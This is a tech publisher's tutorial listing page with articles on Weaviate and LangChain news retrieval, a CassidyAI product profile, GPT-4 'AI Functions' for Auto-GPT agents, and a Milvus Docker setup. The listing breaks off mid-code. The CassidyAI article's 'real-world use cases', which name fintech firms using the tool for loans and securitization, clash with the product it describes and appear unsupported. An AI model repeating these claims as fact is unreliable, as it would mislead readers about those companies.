Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials - AI Tools

89 Articles
article-image-harnessing-weaviate-and-integrating-with-langchain
Alan Bernardo Palacio
31 Aug 2023
20 min read
Save for later

Harnessing Weaviate and integrating with LangChain

Alan Bernardo Palacio
31 Aug 2023
20 min read
IntroductionIn the first part of this series, we built a robust RSS news retrieval system using Weaviate, enabling us to fetch and store news articles efficiently. Now, in this second part, we're taking the next leap by exploring how to harness the power of Weaviate for similarity search and integrating it with LangChain. We will delve into the creation of a Streamlit application that performs real-time similarity search, contextual understanding, and dynamic context building. With the increasing demand for relevant and contextual information, this section will unveil the magic of seamlessly integrating various technologies to create an enhanced user experience.Before we dive into the exciting world of similarity search and context building, let's ensure you're equipped with the necessary tools. Familiarity with Weaviate, Streamlit, and Python will be essential as we explore these advanced concepts and create a dynamic application.Similarity Search and Weaviate IntegrationThe journey of enhancing news context retrieval doesn't end with fetching articles. Often, users seek not just relevant information, but also contextually similar content. This is where similarity search comes into play.Similarity search enables us to find articles that share semantic similarities with a given query. In the context of news retrieval, it's like finding articles that discuss similar events or topics. This functionality empowers users to discover a broader range of perspectives and relevant articles.Weaviate's core strength lies in its ability to perform fast and accurate similarity search. We utilize the perform_similarity_search function to query Weaviate for articles related to a given concept. This function returns a list of articles, each scored based on its relevance to the query.import weaviate from langchain.llms import OpenAI import datetime import pytz from dateutil.parser import parse davinci = OpenAI(model_name='text-davinci-003') def perform_similarity_search(concept):    """    Perform a similarity search on the given concept.    Args:    - concept (str): The term to search for, e.g., "Bitcoin" or "Ethereum"      Returns:    - dict: A dictionary containing the result of the similarity search    """    client = weaviate.Client("<http://weaviate:8080>")      nearText = {"concepts": [concept]}    response = (        client.query        .get("RSS_Entry", ["title", "link", "summary", "publishedDate", "body"])        .with_near_text(nearText)        .with_limit(50)  # fetching a maximum of 50 similar entries        .with_additional(['certainty'])        .do()    )      return response def sort_and_filter(results):    # Sort results by certainty    sorted_results = sorted(results, key=lambda x: x['_additional']['certainty'], reverse=True)    # Sort the top results by date    top_sorted_results = sorted(sorted_results[:50], key=lambda x: parse(x['publishedDate']), reverse=True)    # Return the top 10 results    return top_sorted_results[:5] # Define the prompt template template = """ You are a financial analysts reporting on latest developments and providing an overview about certain topics you are asked about. Using only the provided context, answer the following question. Prioritize relevance and clarity in your response. If relevant information regarding the query is not found in the context, clearly indicate this in the response asking the user to rephrase to make the search topics more clear. If information is found, summarize the key developments and cite the sources inline using numbers (e.g., [1]). All sources should consistently be cited with their "Source Name", "link to the article", and "Date and Time". List the full sources at the end in the same numerical order. Today is: {today_date} Context: {context} Question: {query} Answer: Example Answer (for no relevant information): "No relevant information regarding 'topic X' was found in the provided context." Example Answer (for relevant information): "The latest update on 'topic X' reveals that A and B have occurred. This was reported by 'Source Name' on 'Date and Time' [1]. Another significant development is D, as highlighted by 'Another Source Name' on 'Date and Time' [2]." Sources (if relevant): [1] Source Name, "link to the article provided in the context", Date and Time [2] Another Source Name, "link to the article provided in the context", Date and Time """ # Modified the generate_response function to now use the SQL agent def query_db(query):    # Query the weaviate database    results = perform_similarity_search(query)    results = results['data']['Get']['RSS_Entry']    top_results = sort_and_filter(results)    # Convert your context data into a readable string    context_string = [f"title:{r['title']}\\nsummary:{r['summary']}\\nbody:{r['body']}\\nlink:{r['link']}\\npublishedDate:{r['publishedDate']}\\n\\n" for r in top_results]    context_string = '\\n'.join(context_string)    # Get today's date    date_format = "%a, %d %b %Y %H:%M:%S %Z"    today_date = datetime.datetime.now(pytz.utc).strftime(date_format)    # Format the prompt    prompt = template.format(        query=query,        context=context_string,        today_date=today_date    )    # Print the formatted prompt for verification    print(prompt)    # Run the prompt through the model directly    response = davinci(prompt)    # Extract and print the response    return responseRetrieved results need effective organization for user consumption. The sort_and_filter function handles this task. It first sorts the results based on their certainty scores, ensuring the most relevant articles are prioritized. Then, it further sorts the top results by their published dates, providing users with the latest information to build the context for the LLM.LangChain Integration for Context BuildingWhile similarity search enhances content discovery, context is the key to understanding the significance of articles. Integrating LangChain with Weaviate allows us to dynamically build context and provide more informative responses.LangChain, a language manipulation tool, acts as our context builder. It enhances the user experience by constructing context around the retrieved articles, enabling users to understand the broader narrative. Our modified query_db function now incorporates Langchain's capabilities. The function generates a context-rich prompt that combines the user's query and the top retrieved articles. This prompt is structured using a template that ensures clarity and relevance.The prompt template is a structured piece of text that guides LangChain to generate contextually meaningful responses. It dynamically includes information about the query, context, and relevant articles. This ensures that users receive comprehensive and informative answers.Subsection 2.4: Handling Irrelevant Queries One of LangChain's unique strengths is its ability to gracefully handle queries with limited context. When no relevant information is found in the context, LangChain generates a response that informs the user about the absence of relevant data. This ensures transparency and guides users to refine their queries for better results.In the next section, we will be integrating this enhanced news retrieval system with a Streamlit application, providing users with an intuitive interface to access relevant and contextual information effortlessly.Building the Streamlit ApplicationIn the previous section, we explored the intricate layers of building a robust news context retrieval system using Weaviate and LangChain. Now, in this third part, we're diving into the realm of user experience enhancement by creating a Streamlit application. Streamlit empowers us to transform our backend functionalities into a user-friendly front-end interface with minimal effort. Let's discover how we can harness the power of Streamlit to provide users with a seamless and intuitive way to access relevant news articles and context.Streamlit is a Python library that enables developers to create interactive web applications with minimal code. Its simplicity, coupled with its ability to provide real-time visualizations, makes it a fantastic choice for creating data-driven applications.The structure of a Streamlit app is straightforward yet powerful. Streamlit apps are composed of simple Python scripts that leverage the provided Streamlit API functions. This section will provide an overview of how the Streamlit app is structured and how its components interact.import feedparser import pandas as pd import time from bs4 import BeautifulSoup import requests import random from datetime import datetime, timedelta import pytz import uuid import weaviate import json import time def wait_for_weaviate():    """Wait until Weaviate is available."""      while True:        try:            # Try fetching the Weaviate metadata without initiating the client here            response = requests.get("<http://weaviate:8080/v1/meta>")            response.raise_for_status()            meta = response.json()                      # If successful, the instance is up and running            if meta:                print("Weaviate is up and running!")                return        except (requests.exceptions.RequestException):            # If there's any error (connection, timeout, etc.), wait and try again            print("Waiting for Weaviate...")            time.sleep(5) RSS_URLS = [    "<https://thedefiant.io/api/feed>",    "<https://cointelegraph.com/rss>",    "<https://cryptopotato.com/feed/>",    "<https://cryptoslate.com/feed/>",    "<https://cryptonews.com/news/feed/>",    "<https://smartliquidity.info/feed/>",    "<https://bitcoinmagazine.com/feed>",    "<https://decrypt.co/feed>",    "<https://bitcoinist.com/feed/>",    "<https://cryptobriefing.com/feed>",    "<https://www.newsbtc.com/feed/>",    "<https://coinjournal.net/feed/>",    "<https://ambcrypto.com/feed/>",    "<https://www.the-blockchain.com/feed/>" ] def get_article_body(link):    try:        headers = {            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.3'}        response = requests.get(link, headers=headers, timeout=10)        response.raise_for_status()        soup = BeautifulSoup(response.content, 'html.parser')        paragraphs = soup.find_all('p')        # Directly return list of non-empty paragraphs        return [p.get_text().strip() for p in paragraphs if p.get_text().strip() != ""]    except Exception as e:        print(f"Error fetching article body for {link}. Reason: {e}")        return [] def parse_date(date_str):    # Current date format from the RSS    date_format = "%a, %d %b %Y %H:%M:%S %z"    try:        dt = datetime.strptime(date_str, date_format)        # Ensure the datetime is in UTC        return dt.astimezone(pytz.utc)    except ValueError:        # Attempt to handle other possible formats        date_format = "%a, %d %b %Y %H:%M:%S %Z"        dt = datetime.strptime(date_str, date_format)        return dt.replace(tzinfo=pytz.utc) def fetch_rss(from_datetime=None):    all_data = []    all_entries = []      # Step 1: Fetch all the entries from the RSS feeds and filter them by date.    for url in RSS_URLS:        print(f"Fetching {url}")        feed = feedparser.parse(url)        entries = feed.entries        print('feed.entries', len(entries))        for entry in feed.entries:            entry_date = parse_date(entry.published)                      # Filter the entries based on the provided date            if from_datetime and entry_date <= from_datetime:                continue            # Storing only necessary data to minimize memory usage            all_entries.append({                "Title": entry.title,                "Link": entry.link,                "Summary": entry.summary,                "PublishedDate": entry.published            })    # Step 2: Shuffle the filtered entries.    random.shuffle(all_entries)    # Step 3: Extract the body for each entry and break it down by paragraphs.    for entry in all_entries:        article_body = get_article_body(entry["Link"])        print("\\nTitle:", entry["Title"])        print("Link:", entry["Link"])        print("Summary:", entry["Summary"])        print("Published Date:", entry["PublishedDate"])        # Create separate records for each paragraph        for paragraph in article_body:            data = {                "UUID": str(uuid.uuid4()), # UUID for each paragraph                "Title": entry["Title"],                "Link": entry["Link"],                "Summary": entry["Summary"],                "PublishedDate": entry["PublishedDate"],                "Body": paragraph            }            all_data.append(data)    print("-" * 50)    df = pd.DataFrame(all_data)    return df def insert_data(df,batch_size=100):    # Initialize the batch process    with client.batch as batch:        batch.batch_size = 100        # Loop through and batch import the 'RSS_Entry' data        for i, row in df.iterrows():            if i%100==0:                print(f"Importing entry: {i+1}")  # Status update            properties = {                "UUID": row["UUID"],                "Title": row["Title"],                "Link": row["Link"],                "Summary": row["Summary"],                "PublishedDate": row["PublishedDate"],                "Body": row["Body"]            }            client.batch.add_data_object(properties, "RSS_Entry") if __name__ == "__main__":    # Wait until weaviate is available    wait_for_weaviate()    # Initialize the Weaviate client    client = weaviate.Client("<http://weaviate:8080>")    client.timeout_config = (3, 200)    # Reset the schema    client.schema.delete_all()    # Define the "RSS_Entry" class    class_obj = {        "class": "RSS_Entry",        "description": "An entry from an RSS feed",        "properties": [            {"dataType": ["text"], "description": "UUID of the entry", "name": "UUID"},            {"dataType": ["text"], "description": "Title of the entry", "name": "Title"},            {"dataType": ["text"], "description": "Link of the entry", "name": "Link"},            {"dataType": ["text"], "description": "Summary of the entry", "name": "Summary"},            {"dataType": ["text"], "description": "Published Date of the entry", "name": "PublishedDate"},            {"dataType": ["text"], "description": "Body of the entry", "name": "Body"}        ],        "vectorizer": "text2vec-transformers"    }    # Add the schema    client.schema.create_class(class_obj)    # Retrieve the schema    schema = client.schema.get()    # Display the schema    print(json.dumps(schema, indent=4))    print("-"*50)    # Current datetime    now = datetime.now(pytz.utc)    # Fetching articles from the last days    days_ago = 3    print(f"Getting historical data for the last {days_ago} days ago.")    last_week = now - timedelta(days=days_ago)    df_hist =  fetch_rss(last_week)    print("Head")    print(df_hist.head().to_string())    print("Tail")    print(df_hist.head().to_string())    print("-"*50)    print("Total records fetched:",len(df_hist))    print("-"*50)    print("Inserting data")    # insert historical data    insert_data(df_hist,batch_size=100)    print("-"*50)    print("Data Inserted")    # check if there is any relevant news in the last minute    while True:        # Current datetime        now = datetime.now(pytz.utc)        # Fetching articles from the last hour        one_min_ago = now - timedelta(minutes=1)        df =  fetch_rss(one_min_ago)        print("Head")        print(df.head().to_string())        print("Tail")        print(df.head().to_string())              print("Inserting data")        # insert minute data        insert_data(df,batch_size=100)        print("data inserted")        print("-"*50)        # Sleep for a minute        time.sleep(60)Streamlit apps rely on specific Python libraries and functions to operate smoothly. We'll explore the libraries used in our Streamlit app, such as streamlit, weaviate, and langchain, and discuss their roles in enabling real-time context retrieval.Demonstrating Real-time Context RetrievalAs we bring together the various elements of our news retrieval system, it's time to experience the magic firsthand by using the Streamlit app to perform real-time context retrieval.The Streamlit app's interface, showcasing how users can input queries and initiate similarity searches ensures a user-friendly experience, allowing users to effortlessly interact with the underlying Weaviate and LangChain-powered functionalities. The Streamlit app acts as a bridge, making complex interactions accessible to users through a clean and intuitive interface.The true power of our application shines when we demonstrate its ability to provide context for user queries and how LangChain dynamically builds context around retrieved articles and responses, creating a comprehensive narrative that enhances user understanding.ConclusionIn this second part of our series, we've embarked on the journey of creating an interactive and intuitive user interface using Streamlit. By weaving together the capabilities of Weaviate, LangChain, and Streamlit, we've established a powerful framework for context-based news retrieval. The Streamlit app showcases how the integration of these technologies can simplify complex processes, allowing users to effortlessly retrieve news articles and their contextual significance. As we wrap up our series, the next step is to dive into the provided code and experience the synergy of these technologies firsthand. Empower your applications with the ability to deliver context-rich and relevant information, bringing a new level of user experience to modern data-driven platforms.Through these two articles, we've embarked on a journey to build an intelligent news retrieval system that leverages cutting-edge technologies. We've explored the foundations of Weaviate, delved into similarity search, harnessed LangChain for context building, and created a Streamlit application to provide users with a seamless experience. In the modern landscape of information retrieval, context is key, and the integration of these technologies empowers us to provide users with not just data, but understanding. As you venture forward, remember that these concepts are stepping stones. Embrace the code, experiment, and extend these ideas to create applications that offer tailored and relevant experiences to your users.Author BioAlan Bernardo Palacio is a data scientist and an engineer with vast experience in different engineering fields. His focus has been the development and application of state-of-the-art data products and algorithms in several industries. He has worked for companies such as Ernst and Young, and Globant, and now holds a data engineer position at Ebiquity Media helping the company to create a scalable data pipeline. Alan graduated with a Mechanical Engineering degree from the National University of Tucuman in 2015, participated as the founder of startups, and later on earned a Master's degree from the faculty of Mathematics at the Autonomous University of Barcelona in 2017. Originally from Argentina, he now works and resides in the Netherlands.LinkedIn
Read more
  • 0
  • 0
  • 9844

article-image-revolutionizing-business-productivity-using-cassidyai
Julian Melanson
28 Jun 2023
6 min read
Save for later

Revolutionizing Business Productivity using CassidyAI

Julian Melanson
28 Jun 2023
6 min read
In recent times, the entrepreneurial environment has seen a surge in innovation, particularly in the realm of artificial intelligence. Among the stalwarts of this revolution is Neo, a startup accelerator masterminded by Silicon Valley investor Ali Partovi. In a groundbreaking move in March, Neo entered a strategic partnership with renowned AI research organization OpenAI, and tech giant Microsoft Corp. The objective was clear: to offer no-cost software and expert advice to startups orienting their focus towards AI. This partnership's results are already tangible, with CassidyAI, a startup championed by content creator Justin Fineberg, being one of the companies benefiting from this initiative.CassidyAI: A Pioneer in AI-Driven Business AutomationFineberg recently announced that CassidyAI is stepping out from the shadows, shedding its stealth mode. CassidyAI's primary function is an embodiment of innovation: facilitating businesses to create customized AI assistants, thus automating tasks, optimizing productivity, and integrating AI across entire organizations. With this aim, CassidyAI is at the forefront of a paradigm shift in business process automation and management.Amplifying Productivity: CassidyAI's VisionAt its core, CassidyAI embraces an ambitious vision: to multiply the productivity of every team within an organization by a factor of ten. This tenfold increase isn't just a lofty goal; it is a transformative approach that involves deploying AI technology across business operations. CassidyAI accomplishes this by providing a platform for generating bespoke AI assistants that cater to individual departmental needs. This process involves training these virtual assistants using the specific knowledge base and data sets of each department.Harnessing AI Across Departments: Versatile Use-CasesThe potential applications of CassidyAI's platform are practically limitless. The diversity of use cases underscores the flexibility and versatility of the AI-assistant creation process. In marketing, for instance, teams can train CassidyAI on their unique writing style and marketing objectives, thereby crafting content that aligns perfectly with the brand image. Similarly, sales teams can enhance their outreach initiatives by leveraging CassidyAI's understanding of the sales pitch, process, and customer profiles.In customer service, AI assistants can respond to inquiries accurately and efficiently, with CassidyAI's ability to access comprehensive support knowledge. Engineering teams can train CassidyAI on their technical stack and engineering methods and architecture, enabling more informed technical decisions and codebase clarity. Product teams can use CassidyAI's profound understanding of their team dynamics and user experience principles to drive product ideation and roadmap collaboration. Finally, HR departments can provide employees with quick access to HR documentation through AI assistants trained to handle such inquiries.Data Security and Transparency: CassidyAI's AssuranceBeyond its vast application range, CassidyAI distinguishes itself through its commitment to data security and transparency. The platform's ability to import knowledge from various platforms ensures a deep understanding of a company's brand, operations, and unique selling propositions. Equally important, all interactions with CassidyAI remain reliable and secure due to their stringent data handling practices and clear citation of sources.Setting Up AI Automation: A No-Code ApproachCassidyAI's approach to implementing AI in businesses is straightforward and code-free, catering to those without programming skills. Businesses begin by securely uploading their internal data and knowledge to train CassidyAI on their unique products, strategies, processes, and more. They then construct AI assistants that are fine-tuned for their distinct use cases, without the need to write a single line of code. Once the AI assistants are ready, they can be shared across the team, fostering an atmosphere of AI adoption and collaboration throughout the organization.Interestingly, the onboarding process for each company joining CassidyAI is currently personally overseen by Fineberg. Although this may limit the pace of early access, it provides a personalized and detailed introduction to CassidyAI’s capabilities and potential. Companies interested in exploring CassidyAI's offerings can request a demo through their website.CassidyAI represents a revolutionary approach to adopting AI technology in businesses. By creating tailored AI assistants that cater to the specific needs of different departments, it offers an opportunity to substantially improve productivity and streamline operations. Its emergence from stealth mode signals a new era of AI-led business automation and provides an exciting glimpse into the future of work. It is anticipated that as CassidyAI gains traction, more businesses will leverage this innovative tool to their advantage, fundamentally transforming their approach to task automation and productivity enhancement.You can browse the website and request a demo here: https://www.cassidyai.comReal-World Use casesHere are some specific examples of how CassidyAI is being used by real businesses:Centrifuge: Centrifuge is using CassidyAI to originate real-world assets and to securitize them. This is helping Centrifuge to provide businesses with access to financing and to reduce risk.Tinlake: Tinlake is using CassidyAI to automate the process of issuing and managing loans backed by real-world assets. This is helping Tinlake to provide a more efficient and cost-effective lending solution for businesses.Invoice Finance: Invoice Finance is using CassidyAI to automate the process of processing invoices and to provide financing to businesses based on the value of their invoices. This is helping Invoice Finance to provide a more efficient and timely financing solution for businesses.Bondora: Bondora is using CassidyAI to assess the risk of loans and to provide investors with more information about the loans they are considering investing in. This is helping Bondora to provide a more transparent and efficient investment platform for investors.Upstart: Upstart is using CassidyAI to assess the creditworthiness of borrowers and to provide them with more personalized lending terms. This is helping Upstart to provide a more inclusive and affordable lending solution for borrowers.These are just a few examples of how CassidyAI is being used by real businesses to improve their operations and to provide better services to their customers. As CassidyAI continues to develop, it is likely that even more use cases will be discovered.SummaryCassidyAI, a startup in partnership with Neo, OpenAI, and Microsoft, is revolutionizing business productivity through AI-driven automation. Their platform enables businesses to create customized AI-assistants, optimizing productivity and integrating AI across departments. With a no-code approach, CassidyAI caters to various use-cases, including marketing, sales, customer service, engineering, product, and HR. The platform emphasizes data security and transparency while providing a personalized onboarding process. As CassidyAI emerges from stealth mode, it heralds a new era of AI-led business automation, offering businesses the opportunity to enhance productivity and streamline operations.Author BioJulian Melanson is one of the founders of Leap Year Learning. Leap Year Learning is a cutting-edge online school that specializes in teaching creative disciplines and integrating AI tools. We believe that creativity and AI are the keys to a successful future and our courses help equip students with the skills they need to succeed in a continuously evolving world. Our seasoned instructors bring real-world experience to the virtual classroom and our interactive lessons help students reinforce their learning with hands-on activities.No matter your background, from beginners to experts, hobbyists to professionals, Leap Year Learning is here to bring in the future of creativity, productivity, and learning!
Read more
  • 0
  • 0
  • 9462

article-image-using-ai-functions-to-solve-complex-problems
Shaun McDonogh
09 Jun 2023
8 min read
Save for later

Using AI Functions to Solve Complex Problems

Shaun McDonogh
09 Jun 2023
8 min read
GPT-4 feels like Einstein's theory of general relativity, in that it will take programmers a long time to uncover all the new possibilities which is analogous to how physicists today are still extracting useful insights from Einstein's theory of general relativity.Here is one example. Big problems can be solved by breaking them down into small tasks. Our jobs usually boil down into performing one problem-solving or productive activity after the next. So, what if you could discern clearly what those smaller tasks were and give them to your side-kick brain to figure out and run for you ‘auto-magically’?Note that the above says, what if you could discern. Already we bump up against a lesson in using LLMs. Why do you need to discern it? Can’t GPT-4 be given the job of discerning the tasks required? If so, could it then orchestrate other GPT-4 “agents” to break down the task further? This is exactly where we can make use of a tool like Auto-GPT.Let’s look at an example that I am developing right now for an Auto-GPT using Rust.Say you build websites for a living. Websites need a web server. Web servers take a request (usually through an API), run some code in line with that request and send back a response. Let’s break down the goal of building a web server into what actors or agents might be required when building an Auto-GPT:Solution Architect: Work with the customer (you) to develop scope and aim of the application. Confirm the recommended technology stack to work within.Project (Agent) Manager: Compile and track preliminary list of tasks needed to complete the project.Data Manager: Identify required External and Internal API endpoints.Code Admin: Write code spec sheet for developer.Junior Developer:Take a first stab at code.Run unit testing.Senior Developer:Sense check initial code and adjust.Run unit testing.Quality Control: Test and send back code for adjustments.Customer (you): Supply feedback and request adjustments.You may have guessed that we will not be hiring 7 members of staff to build web servers. However, planning out this structure is necessary to help us organise building a bot that can itself build, test, and deploy any backend server you ask it to.Our agents will need tools to work with. They need to be given a set of instructions and functions that will get the subtask done without the usual response of “I am just an AI language model”. When developing such a tool, it became clear to me that a new paradigm has hit developers, “AI Functions”. What we are about to discuss brings up potential gaps in the guard-rails of GPT-4 which is unlikely to be news to the OpenAI team but may be of some surprise to you.What are AI Functions?The fact that AI hallucinates would annoy most people. But not to programmers and the folk who developed Marvin. Right now, when you ask ChatGPT to provide you with a response, it sends a whole bunch of jargon with it.What if I told you there was a hack, a way to get distilled and relevant information out of ChatGPT automatically through the OpenAI API that leads to a structured response that can drive actions in your code. Here is an example. Suppose you give an AI the following “function” which is just text disguised as a programming function:struct Sentiment {       happy_rating: 0, sad_rating: 0 } fn convert_comments_into_sentiment(comments: String) -> Sentiment {       // Function takes in comments from YouTube video       // Considers all aspects of what is said in comments       // Returns Sentiment struct with happy and sad rating       // Does not return anything else. No commentary.       return sentiment; }You then ask the AI to print only what the function would return and pass it the YouTube comments as an input. The AI (GPT-4) would then hallucinate a response, even without there being any actual code within the function. None. There is no code to perform this task.No jargon like “I am an AI I cannot blah blah blah” is returned. Nothing like that, you would extract the AI’s pure sentiment analysis in a format which you can then build into your application.The hack here is that we have built a pretend function, without any code in it. We described exactly what this function (written in Rust syntax in this example) does and the structure of its output using comments and a struct.GPT-4 then interprets what it thinks the function does and assesses it against the input provided (YouTube comments in this example). The output is then structured in the LLM’s response. Therefore, we can have LLMs supply responses that are structured in such a way that can be used by other agents (also the GPT-4 LLM).The entire process would look something like this: This is an oversimplified view of what is happening. Note that agents are not always needed. Sometimes the function can just be called as regular code, no LLM needed.The Bigger PictureWhy stop there? Auto-GPTs will likely then become like plugins. With Auto-GPTs popping up everywhere, most software related tasks can be taken care of. Rather than calling an API, your Auto-GPT could call another Auto-GPT. Rather than write AI Functions, a primary agent would know what Auto-GPTs should be assigned to various tasks. It could then write its own program that connects to them.This sort of recursion or self-improvement is where predicted growth in AI is already shown to function as predicted either exponentially or in sigmoid-like jumps. My own version of this self-programming task is already done. It was surprisingly trivial to do with GPT-4’s help. It works well, but it doesn’t replace human developers yet.Not All Sunshine and RosesGPT-4 is not without some annoying limitations; these include:Quality of performance at the given taskChanges in quality response depending on a slight change in input.Text formatting to occasionally include something the model should not.Size and dollar cost of outputTime, latency, delay and crashing of API output.These limitations could technically be worked around by breaking down tasks into even smaller chunks, but this is where I draw a line. What is the point of trying to automate anything, if you end up having to code everything? However, it has become clear through this exercise, that just a few improvements on the above limitations will lead to a significant amount of task automation with AutoGPTs.Quick Wins with Self-testingOne unique algorithm which has worked very well with the current technology is the ability for GPT-4 to write code and for our program to then execute and test the code and provide feedback to GPT-4 of what is not working. The AI Function then prompts GPT-4 as a “Senior Developer Agent” to re-write the code and return to the “Quality Agent” for more unit testing.What you end up with is a program that can write code, test it, and confirm all is working. This is working now and is useful. The downside is still the cost of making too many calls to the OpenAI API and some quality limitations with GPT-4. Therefore, until GPT-5, I remain working directly in my development environment or in the ChatGPT interface extracting quick code snippets.Next StepsIt sounds clichéd but I’m learning something new every day working with LLMs. A recurring realisation is that we should not only be trying to solve newer problems in less time, but rather, learning what the right questions to ask our current LLMs even are. They are capable of more than I believe we realise. When Open Source LLMs reach a GPT-5 like level, Auto-GPTs I suspect will be everywhere.Author BioShaun McDonogh is the lead developer and researcher at Crypto Wizards. He has 6 years’ experience in developing high performance trading software solutions with ML and 15 years’ experience working with frontend and backend web technologies.In his prior career, Shaun worked as a Finance Director, Data Scientist and Analytics Lead in various multi-million-dollar entities before making the transition to developing pioneering solutions for developers in emerging tech industries. His favorite programming languages to teach include Rust, Typescript and Python.Shaun’s mission is to support developers in navigating the ever-changing landscape of emerging technologies in computer software engineering through a new coding arm, Code Raiders.
Read more
  • 0
  • 0
  • 9033

article-image-hands-on-vector-similarity-search-with-milvus
Alan Bernardo Palacio
21 Aug 2023
14 min read
Save for later

Hands-On Vector Similarity Search with Milvus

Alan Bernardo Palacio
21 Aug 2023
14 min read
IntroductionIn the realm of AI and machine learning, effective management of vast high-dimensional vector data is critical. Milvus, an open-source vector database, tackles this challenge using advanced indexing for swift similarity search and analytics, catering to AI-driven applications.Milvus operates on vectorization and quantization, converting complex raw data into streamlined high-dimensional vectors for efficient indexing and querying. Its scope spans recommendation, image recognition, natural language processing, and bioinformatics, boosting result precision and overall efficiency.Milvus impresses not just with capabilities but also design flexibility, supporting diverse backends like MinIO, Ceph, AWS S3, Google Cloud Storage, alongside etcd for metadata storage.Local Milvus deployment becomes user-friendly with Docker Compose, managing multi-container Docker apps well-suited for Milvus' distributed architecture. The guide delves into Milvus' core principles—vectorization and quantization—reshaping raw data into compact vectors for efficient querying. Its applications in recommendation, image recognition, natural language processing, and bioinformatics enhance system accuracy and efficacy.The next article details deploying Milvus locally via Docker Compose. This approach's simplicity underscores Milvus' user-centric design, delivering robust capabilities within an accessible framework. Let’s get started.Standalone Milvus with Docker ComposeSetting up a local instance of Milvus involves a multi-service architecture that consists of the Milvus server, metadata storage, and object storage server. Docker Compose provides an ideal environment to manage such a configuration in a convenient and efficient way.The Docker Compose file for deploying Milvus locally consists of three services: etcd, minio, and milvus itself. etcd provides metadata storage, minio functions as the object storage server and milvus handles vector data processing and search. By specifying service dependencies and environment variables, we can establish seamless communication between these components. milvus, etcd, and minio services are run in isolated containers, ensuring operational isolation and enhanced security.To launch the Milvus application, all you need to do is execute the Docker Compose file. Docker Compose manages the initialization sequence based on service dependencies and takes care of launching the entire stack with a single command. The next is the docker-compose.yml which specifies all of the aforementioned components:version: '3' services: etcd:    container_name: milvus-etcd    image: quay.io/coreos/etcd:v3.5.5    environment:      - ETCD_AUTO_COMPACTION_MODE=revision      - ETCD_AUTO_COMPACTION_RETENTION=1000      - ETCD_QUOTA_BACKEND_BYTES=4294967296      - ETCD_SNAPSHOT_COUNT=50000    command: etcd -advertise-client-urls=http://127.0.0.1:2379 -listen-client-urls <http://0.0.0.0:2379> --data-dir /etcd minio:    container_name: milvus-minio    image: minio/minio:RELEASE.2022-03-17T06-34-49Z    environment:      MINIO_ACCESS_KEY: minioadmin      MINIO_SECRET_KEY: minioadmin    ports:      - "9001:9001"      - "9000:9000"    command: minio server /minio_data --console-address ":9001"    healthcheck:      test: ["CMD", "curl", "-f", "<http://localhost:9000/minio/health/live>"]      interval: 30s      timeout: 20s      retries: 3 milvus:    container_name: milvus-standalone    image: milvusdb/milvus:v2.3.0-beta    command: ["milvus", "run", "standalone"]    environment:      ETCD_ENDPOINTS: etcd:2379      MINIO_ADDRESS: minio:9000    ports:      - "19530:19530"      - "9091:9091"    depends_on:      - "etcd"      - "minio"After we have defined the docker-compose file we can deploy the services by first running docker compose build and then running docker compose up -d.In the next section, we'll move on to a practical example — creating sentence embeddings. This process leverages Transformer models to convert sentences into high-dimensional vectors. These embeddings capture the semantic essence of the sentences and serve as an excellent demonstration of the sort of data that can be stored and processed with Milvus.Creating sentence embeddingsCreating sentence embeddings involves a few steps: preparing your environment, importing necessary libraries, and finally, generating and processing the embeddings. We'll walk through each step in this section assuming that this code is being executed in a Python environment where the Milvus database is running.First, let’s start with the requirements.txt file:transformers==4.25.1 pymilvus==2.1.0 torch==2.0.1 protobuf==3.18.0 Now let’s import the packages. import numpy as np import torch import torch.nn.functional as F from transformers import AutoTokenizer, AutoModel from pymilvus import (    connections,    utility,    FieldSchema, CollectionSchema, DataType,    Collection, )Here, we're importing all the necessary libraries for our task. numpy and torch are used for mathematical operations and transformations, transformers is for language model-related tasks, and pymilvus is for interacting with the Milvus server.This Python code block sets up the transformer model we will be using and lists the sentences for which we will generate embeddings. We first specify a model checkpoint ("sentence-transformers/all-MiniLM-L6-v2") that will serve as our base model for sentence embeddings. We then define a list of sentences to generate embeddings for. To facilitate our task, we initialize a tokenizer and model using the model checkpoint. The tokenizer will convert our sentences into tokens suitable for the model, and the model will use these tokens to generate embeddings:# Transformer model checkpoint model_ckpt = "sentence-transformers/all-MiniLM-L6-v2" # Sentences for which we will compute embeddings sentences = [    "I took my dog for a walk",    "Today is going to rain",    "I took my cat for a walk", ] # Initialize tokenizer and model tokenizer = AutoTokenizer.from_pretrained(model_ckpt) model = AutoModel.from_pretrained(model_ckpt)Here, we define the model checkpoint that we will use to get the sentence embeddings. We then initialize a list of sentences for which we will compute embeddings. The tokenizer and model are initialized using the defined checkpoint.We've obtained token embeddings, but we need to aggregate them to obtain sentence-level embeddings. For this, we'll use a mean pooling operation. The upcoming section of the guide will define a function to accomplish this.Mean Pooling Function DefinitionThis function is used to aggregate the token embeddings into sentence embeddings. The token embeddings and the attention mask (which indicates which tokens are not padding and should be considered for pooling) are passed as inputs to this function. The function performs a weighted average of the token embeddings according to the attention mask and returns the aggregated sentence embeddings:# Mean pooling function to aggregate token embeddings into sentence embeddings def mean_pooling(model_output, attention_mask):    token_embeddings = model_output.last_hidden_state    input_mask_expanded = (        attention_mask.unsqueeze(-1).expand(token_embeddings.size()).float()    )    return torch.sum(token_embeddings * input_mask_expanded, 1) / torch.clamp(       input_mask_expanded.sum(1), min=1e-9    )This function takes the model output and the attention mask as input and returns the sentence embeddings by performing a mean pooling operation over the token embeddings. The attention mask is used to ignore the tokens corresponding to padding during the pooling operation.Generating Sentence EmbeddingsThis code snippet first tokenizes the sentences, padding and truncating them as necessary. We then use the transformer model to generate token embeddings. These token embeddings are pooled using the previously defined mean pooling function to create sentence embeddings. The embeddings are normalized to ensure consistency and finally transformed into Python lists to make them compatible with Milvus:# Tokenize the sentences and compute their embeddings encoded_input = tokenizer(sentences, padding=True, truncation=True, return_tensors="pt") with torch.no_grad():    model_output = model(**encoded_input) sentence_embeddings = mean_pooling(model_output, encoded_input["attention_mask"]) # Normalize the embeddings sentence_embeddings = F.normalize(sentence_embeddings, p=2, dim=1) # Convert the sentence embeddings into a format suitable for Milvus embeddings = 